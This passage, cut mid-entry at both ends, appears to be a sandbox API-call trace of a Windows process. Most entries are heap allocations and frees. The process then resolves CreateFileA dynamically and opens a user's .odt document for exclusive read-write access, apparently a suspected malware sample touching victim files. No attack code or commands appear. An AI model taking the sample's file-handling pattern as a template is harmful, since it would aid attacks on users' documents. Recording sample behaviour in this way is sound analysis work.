Flags=0x0, Size=0x8) returned 0x8e1d30 [0172.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0172.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0172.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0172.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0172.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0172.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0172.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0172.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0172.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0172.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0172.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0172.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0172.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0172.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0172.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0172.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0172.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0172.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0172.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0172.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0172.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0172.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0172.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0172.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0172.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0172.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0172.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0172.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0172.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0172.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0172.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0172.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0172.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0172.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0172.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0172.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0172.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0172.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0172.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0172.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0172.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0172.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0172.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0172.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0172.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0172.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0172.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0172.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0172.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0172.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0172.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0172.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0172.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0172.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0172.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0172.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0172.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0172.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0172.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0172.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0172.784] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0172.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0172.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0172.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0172.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0172.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0172.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0172.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0172.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0172.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0172.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0172.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0172.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0172.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0172.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0172.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0172.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0172.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0172.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0172.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0172.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0172.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0172.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0172.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0172.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0172.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0172.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0172.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0172.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0172.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0172.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0172.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0172.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0172.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0172.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0172.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0172.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0172.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0172.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0172.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0172.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0172.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0172.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0172.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0172.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0172.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0172.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0172.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0172.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0172.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0172.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0172.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0172.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0172.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0172.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0172.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0172.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0172.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0172.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0172.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0172.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0172.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0172.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0172.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0172.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0172.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0172.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0172.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0172.787] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0172.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0172.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0172.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0172.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0172.787] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0172.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0172.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0172.788] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0172.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9ba0d8 [0172.788] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9ba0d8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0172.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0172.788] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0172.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0172.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0172.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0172.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0172.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0172.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0172.788] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0172.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba0d8 [0172.788] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9ba0d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0172.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0172.789] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0172.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0172.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0172.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0172.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0172.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0172.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0172.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0172.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0172.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0172.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0172.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0172.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0172.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0x9c5180 [0172.790] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\P_2cHhLM.odt", cchWideChar=69, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 69 [0172.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x45) returned 0x9aa4f8 [0172.790] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\P_2cHhLM.odt", cchWideChar=69, lpMultiByteStr=0x9aa4f8, cbMultiByte=69, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\P_2cHhLM.odt", lpUsedDefaultChar=0x0) returned 69 [0172.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0172.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0172.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0172.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0172.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0172.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0172.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0172.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0172.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0172.790] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\P_2cHhLM.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwbyebinhhcjlml\\p_2chhlm.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0172.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0172.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0172.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0172.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0172.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0172.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0172.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0172.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0172.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0172.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0172.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0172.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0172.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0172.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0172.793] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x9c5180, cbMultiByte=69, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0172.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8a) returned 0x8ee038 [0172.793] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x9c5180, cbMultiByte=69, lpWideCharStr=0x8ee038, cchWideChar=69 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\P_2cHhLM.odt") returned 69 [0172.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0172.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8edfa0 [0172.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0172.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0172.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0172.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0172.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0172.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0172.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0172.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0172.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0172.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0172.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0172.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0172.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0172.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0172.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0172.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0172.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0172.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0172.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0172.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0172.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0172.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0172.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0172.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0172.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0172.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0172.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0172.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0172.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0172.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 